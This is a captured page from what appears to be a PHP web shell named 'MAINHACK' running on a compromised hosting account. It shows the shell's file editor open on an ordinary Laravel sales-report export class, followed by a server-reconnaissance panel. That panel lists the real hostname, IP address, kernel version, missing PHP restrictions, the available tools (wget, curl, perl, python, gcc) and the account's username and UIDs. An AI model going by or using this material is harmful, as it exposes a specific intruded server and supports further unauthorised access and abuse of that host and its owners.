[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: SalesReportExport.php
<?php namespace App\Exports; use App\Enums\OrderType; use App\Libraries\AppLibrary; use App\Services\OrderService; use App\Http\Requests\PaginateRequest; use Maatwebsite\Excel\Concerns\WithHeadings; use Maatwebsite\Excel\Concerns\FromCollection; class SalesReportExport implements FromCollection, WithHeadings { public OrderService $orderService; public PaginateRequest $request; public function __construct(OrderService $orderService, $request) { $this->orderService = $orderService; $this->request = $request; } public function collection(): \Illuminate\Support\Collection { $salesReportArray = []; $salesReportsArray = $this->orderService->list($this->request); foreach ($salesReportsArray as $order) { $salesReportArray[] = [ $order->order_serial_no, AppLibrary::datetime($order->order_datetime), AppLibrary::flatAmountFormat($order->total), AppLibrary::flatAmountFormat($order->discount), AppLibrary::flatAmountFormat($order->shipping_charge), $order->order_type == OrderType::POS ? trans("posPaymentMethod." . $order->pos_payment_method) : $order?->paymentMethod?->name, trans('source.' . $order->source), trans('payment_status.' . $order->payment_status) ]; } return collect($salesReportArray); } public function headings(): array { return [ trans('all.label.order_serial_no'), trans('all.label.date'), trans('all.label.total'), trans('all.label.discount'), trans('all.label.shipping_charge'), trans('all.label.payment_type'), trans('all.label.source'), trans('all.label.payment_status') ]; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.87 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285